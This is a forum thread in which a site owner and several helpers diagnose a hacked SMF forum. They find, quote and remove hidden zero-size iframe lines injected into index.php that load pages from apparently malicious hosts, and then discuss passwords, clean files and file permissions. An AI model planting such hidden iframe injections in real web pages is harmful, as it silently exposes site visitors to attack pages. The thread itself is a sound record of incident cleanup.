News:

Join the Facebook Fan Page.

Main Menu

this is odd?

Started by blazinchuck, March 14, 2011, 11:10:38 AM

Previous topic - Next topic

blazinchuck

why would this be happening now? whenever i go to my site http://carolinadiesels.com  it redirects me to the bottom of whatever page i choose? if i go the the portal...it takes me to the bottom, the forum...takes me to the bottom? never seen this happen before. im sure its not something ever one might be seeing...maybe just me? any thoughts, thanks,Chuck
"I'm not as Think, as you stoned I am"

NanoSector

I can see it too.

Does it happen on the default theme?
http://carolinadiesels.com/index.php?theme=1
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

Road Rash Jr.

I don't get redirected to the bottom but I did notice your logo at the top extends beyond the theme boarder to the right.
Never argue with an Idiot like myself, they just drag you down to their level then beat you with experience.

HunterP


I don't know what the meaning is of this code at the bottom of your page, but you should try to localize and remove it :

<!-- ~ --><iframe src="http://videoonlinefree.co.cc/hck" width="0" height="0" frameborder="0"></iframe><!-- ~ -->


kat

You might want to check the files on your site, too.

That line is screaming "HACKED!", to me.

NanoSector

Quote from: K@ on March 14, 2011, 03:24:39 PM
You might want to check the files on your site, too.

That line is screaming "HACKED!", to me.
It screams that to me too. Afraid of opening that link...

And you may like to use the kbscan.php utility.
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

busterone

Look for the iframe code in index.php. Then, yes, by all means scan with kbscan.php.
Are you running any other scripts besides SMF?

blazinchuck

where are yall seeing this code???

scripts? im running smf and thats it...i guess?
"I'm not as Think, as you stoned I am"

blazinchuck

#8
ok, i looked at the page source and see the line code...not sure how it got there. where can i find this kbscan.php?

edit...I found the kb_scan...ran it(everything was good)...so I went in the index.php file and removed the line code. now im not redirected to the bottom of the page. go figure???


thanks guys. wish i knew how that code got placed there
"I'm not as Think, as you stoned I am"

busterone

It got there somehow.  ;D
If I were in your place, I would immediately change my host control panel login password, ftp password, and forum admin password.  I would also watch it very close for a while. It is odd. If someone went to the trouble to hack your site, usually they do more than place one line with an iframe link. I did not follow the link, but I did find a few google results where others have had that same code show up on their site, but no mention of how malicious it may or not be. I took no chance myself though.  :)


blazinchuck

if i just removed the other line code...does this mean another was replaced with it?? or is this a stock code?

<!-- ~ --><iframe src="http://bfe.org/board" width="0" height="0" frameborder="0"></iframe><!-- ~ -->


i will change all the PW's later today


funny thing is...i clicked the link posted earlier...and the one i just posted and they both went to the same site!!!!

I GUESS IT WAS A HACK!

"This web page at traffichistic.co.cc has been reported as an attack page and has been blocked based on your security preferences."
"I'm not as Think, as you stoned I am"

NanoSector

You surely need to reupload a fresh pair of SMF & mod (& possibly theme) files.

Then change passwords ASAP!
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

Arantor

Odds are the server is compromised, rather than your password being compromised.

blazinchuck

Quote from: Arantor on March 16, 2011, 12:43:17 PM
Odds are the server is compromised, rather than your password being compromised.
so should i upload my last full back up? i ran that kbscan and got nothing bad...

change all passwords, what needs to be done with the server...anything??
"I'm not as Think, as you stoned I am"

Arantor

Better still, what are the current file permissions?

blazinchuck

i guess whatever they were before 775,777,etc...is that what your asking?

i have no way of checking right now(at work)
"I'm not as Think, as you stoned I am"

Arantor

That's what I'm asking, at least... you see, if they're 777, it means that anyone else on the same server as you could have compromised your files...

blazinchuck

Quote from: Arantor on March 16, 2011, 01:06:39 PM
That's what I'm asking, at least... you see, if they're 777, it means that anyone else on the same server as you could have compromised your files...
any way to prevent that? i cant just change the permissions right....then site wont work right?thanks Arantor
"I'm not as Think, as you stoned I am"

Arantor

Sure you can change them, all it means is you can't install mods as easily.

Advertisement: